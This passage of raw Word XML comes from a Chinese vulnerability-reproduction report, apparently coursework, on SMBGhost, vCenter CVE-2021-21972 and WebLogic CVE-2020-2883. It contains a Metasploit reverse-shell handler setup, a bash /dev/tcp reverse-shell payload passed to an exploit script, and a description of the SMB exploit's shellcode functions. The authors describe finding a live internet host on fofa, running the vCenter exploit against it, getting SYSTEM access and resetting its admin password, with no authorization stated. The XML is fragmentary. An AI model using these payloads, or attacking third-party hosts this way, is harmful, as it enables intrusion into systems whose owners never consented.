    </w:p>
    <w:p>
      <w:r>
        <w:t>执行这些命令后，vi会将exploit文件中所有的buf替换为USER_PAYLOAD，然后保存这些更改并退出编辑器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改后的exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3654425"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="21" name="图片 21" descr="屏幕截图 2024-07-19 13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07-19 1326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将工具中的exploit.py文件中的USER_PAYLOAD部分替换成exploit文件的内容，生成最终的exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3961130"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="23" name="图片 23" descr="屏幕截图 2024-07-19 133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7-19 1332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2405" cy="3573145"/>
            <wp:effectExtent l="0" t="0" r="10795" b="8255"/>
            <wp:docPr id="24" name="图片 24" descr="屏幕截图 2024-07-19 133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07-19 1332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等等，完整代码参考附件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后再重新打开窗口配置msf并进行监听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Msfconsole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use exploit/multi/handler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set payload windows/x64/meterpreter/reverse_tcp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show options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set lhost 192.168.188.130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set lport 5555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Run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先选择并加载 Metasploit 的多处理程序模块，设置要使用的 Payload 为 Windows x64 平台的反向 TCP Meterpreter。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后设置监听主机的 IP 地址为 192.168.188.130，并且设置监听端口为 5555。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后运行 Metasploit 处理程序，开始监听连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1341120"/>
            <wp:effectExtent l="0" t="0" r="10795" b="5080"/>
            <wp:docPr id="25" name="图片 25" descr="屏幕截图 2024-07-20 220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7-20 2205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0" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="31" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="32" w:name="_Toc75461104"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并在另一个窗口运行刚修改好的exploit.py 文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>python3 exploit.py -ip 靶机IP地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2194560"/>
            <wp:effectExtent l="0" t="0" r="10795" b="2540"/>
            <wp:docPr id="27" name="图片 27" descr="屏幕截图 2024-07-20 22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7-20 22075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在运行过程中也会出现一些报错，需要检查靶机是否将病毒与威胁保护关闭，检查后再次运行，直到运行成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf也可以监听成功反弹的shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1500505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="10795"/>
            <wp:docPr id="28" name="图片 28" descr="屏幕截图 2024-07-19 17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7-19 1739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2619375"/>
            <wp:effectExtent l="0" t="0" r="12065" b="9525"/>
            <wp:docPr id="29" name="图片 29" descr="屏幕截图 2024-07-19 17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07-19 17404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由此，我们的漏洞利用成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.1.2 测试中所用的工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Window10 专业版 version 1903 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali linux 2021.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc24942"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.2.2 CVE-2021-21972</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.2.1 详细过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们进行漏洞环境搭建：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们先在VMWare中安装VMware vSphere虚拟机监控程序EXSi 7.0.0，安装成功后访问EXSi的ip地址（ip地址可自行设置），界面如下，可进行登录。</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2538095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="552413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1397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41220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1139434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3468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登录后在管理-许可界面分配许可证，进行激活。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2216150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="692171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7111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下一步，在EXSi上装载VMWare</w:t>
      </w:r>
      <w:r>
        <w:t> vCenter Serve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r 7.0.0，将安装包解压后，运行install.exe，进行安装。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4234180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="559757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5796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35095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="912816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1697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按步骤安装完成之后访问VCSA的ip地址（ip地址可自行设置），界面如下。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1866265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1602007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0732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rcRect t="16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环境搭建成功后，我们进行漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF0F4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞所在地址为：</w:t>
      </w:r>
      <w:r>
        <w:t>https://ip/ui/vropspluginui/rest/services/up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>ova</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问该地址，如果返回405，则代表存在漏洞，漏洞复现成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5271135" cy="896620"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="12003094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09484" name="图片 4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7" b="668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另外，我们还在fofa上找到了符合条件的外网测试目标，ip地址及端口号为178.237.192.2:9144。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="3649894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89459" name="图片 6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因此，可以不进行环境搭建，直接访问：</w:t>
      </w:r>
    </w:p>
    <w:p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9"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>178.237.192.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> /ui/vropspluginui/rest/services/uploadova</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如图，返回405，代表存在漏洞，漏洞复现成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="828040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11657389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8977" name="图片 5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漏洞复现成功后，我们还可以通过GitHub下载漏洞利用脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>漏洞利用脚本 github地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>https://github.com/NS-Sp4ce/CVE-2021-21972</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/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67945</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5268595" cy="4787265"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13335"/>
            <wp:wrapNone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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载运行该脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3538855"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1206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连接成功后就拿到了目标系统的system权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>这时候我们发现拿到机器也登陆不上控制平台，要登录还需要密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在vcenter的安装目录里有一个vdcadmintool.exe，我们可以利用这个工具对平台的密码进行修改，他会生成新的随机密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>运行它会出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>下选项，我们选择3，然后输入用户名，</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">HYPERLINK "mailto:%E5%9C%A8%E8%BF%99%E6%88%91%E4%BB%AC%E7%9B%B4%E6%8E%A5%E8%92%99%E4%BA%86%E4%B8%80%E4%B8%AA%E4%BB%96%E7%9A%84%E5%88%9D%E5%A7%8B%E7%94%A8%E6%88%B7%E5%90%8Dadministrator@vsphere.local" \o "在这我们直接蒙了一个他的初始用户名administrator@vsphere.local"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们尝试一下</w:t>
      </w:r>
      <w:r>
        <w:t>初始用户名administrator@vsphere.local</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>，正确之后就能修改密码了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3038475" cy="2343150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="381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在修改成功之后。我们利用新生成的密码成功进入控制平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.2.2测试中所用的工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VMWare vSphere(EXSi) 版本：7.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VMWare vCenter Server(VCSA) 版本：7.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc11268"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.2.3 CVE-2020-2883</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.3.1漏洞介绍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Oracle官方发布的2020年4月关键补丁更新公告CPU（Critical Patch Update）中，两个针对 WebLogic Server ，CVSS 3.0评分为 9.8的严重漏洞（CVE-2020-2883、CVE-2020-2884），允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功的漏洞利用可导致WebLogic Server被攻击者接管，从而造成远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>影响范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle WebLogic Server 10.3.6.0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle WebLogic Server 12.1.3.0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle WebLogic Server 12.2.1.3.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle WebLogic Server 12.2.1.4.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.3.3 漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在vulfocus上创建对应虚拟环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3515360"/>
            <wp:effectExtent l="0" t="0" r="10795" b="254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启动镜像网址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="1997710"/>
            <wp:effectExtent l="0" t="0" r="6985" b="889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在攻击机上首先开启nc监听</w:t>
      </w:r>
      <w:r>
        <w:t>nc -lvvp 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6666</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行攻击脚本，反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/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python weblogic-2883.py -u http://123.58.224.8:31898/ -c "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp; /dev/tcp/192.168.188.128/16666 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们注意到，运行该指令可以得到payload发送成功，但并没有在监听端口获取反弹shell,查阅后发现要进行based64编码，因此我们将指令编码后再执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="544195"/>
            <wp:effectExtent l="0" t="0" r="12065" b="190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其中CVE-2020-2883.py 为poc文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4835525" cy="1896745"/>
            <wp:effectExtent l="0" t="0" r="3175" b="825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>如上图所示，成功反弹shell，访问/tmp/目录成功获取flag</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkEnd w:id="32"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="36" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="37" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="38" w:name="_Toc916"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc23321"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 SMB远程代码执行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc27993"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.1.1 POC插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>低位跳转字节及其他常量设置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>设置了一些内存地址和偏移量，例如LOWSTUB_JMP、PML4_LOWSTUB_OFFSET等，这些在后续的内存操作中会被使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>内核Shellcode和用户Payload：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>KERNEL_SHELLCODE是一段内核级别的Shellcode，用于在被攻击系统内核中执行特定操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>USER_PAYLOAD是一段用户级别的Payload，通常用于实现特定的恶意行为，例如反向Shell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>内存描述符列表（MDL）类：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>MDL类用于描述内存映射，包含了物理地址、虚拟地址、字节数量等信息。这个类可以将这些信息打包成原始字节数据，用于后续的内存读写操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>重连函数：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>reconnect函数用于创建与远程服务器的TCP连接，并设置超时。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:t>写入原语操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>write_primitive函数用于向远程系统的指定地址写入数据，通过SMB协议进行压缩数据的传输。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:t>读取物理内存操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>read_physmem_primitive和try_read_physmem_primitive函数用于读取远程系统的物理内存数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:t>获取物理地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>get_phys_addr函数用于计算虚拟地址对应的物理地址，这在读写操作中至关重要。</w:t>
      </w:r>
    </w:p>
    <w:p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由于该漏洞需要在window10关闭防火墙，暂未找到符合要求的外网ip，但也撰写了在pocsuite3运行的poc代码，同时利用poc实现漏洞利用在自己搭建的虚拟机平台也有实现视频进行了poc的验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc4576"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.1.2 漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblW w:w="922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1559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="15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UVD-ID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Cve-2020-0796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漏洞类别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远程代码执行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CVE-ID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Cve-2020-0796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披露/发现时间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2020年3月10日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bugtraq编号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105227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CNNVD-202003-1282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提交时间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漏洞发现者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未公开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CNVD-2020-10487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漏洞等级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高危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提交者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未公开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搜索关键词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"CVE-2020-0796", "SMBGhost", "EternalDarkness"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影响范围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Windows 10 Version 1903, Windows 10 Version 1909, Windows Server Version 1903, Windows Server Version 1909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来源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微软公司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漏洞简介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CVE-2020-0796 是一个影响 SMBv3 协议的远程代码执行漏洞，亦被称为 “SMBGhost” 或 “EternalDarkness”。该漏洞允许远程攻击者通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>特</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>制的数据包在目标系统上执行任意代码。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漏洞详情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jc w:val="both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该漏洞存在于 SMBv3 协议的压缩机制中，未经身份验证的攻击者可以通过发送特制的数据包触发此漏洞，从而在目标系统上执行任意代码。这使得攻击者能够完全控制受影响的系统，可能导致数据泄露、服务中断等严重后果。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参考链接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jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://www.freebuf.com/column/230287.html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靶场信息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480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在本地虚拟机安装window10 version1903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POC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from pocsuite3.api import POCBase, Output, register_poc, OptString</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>from smbprotocol.connection import Connection</w:t>
            </w:r>
          </w:p>
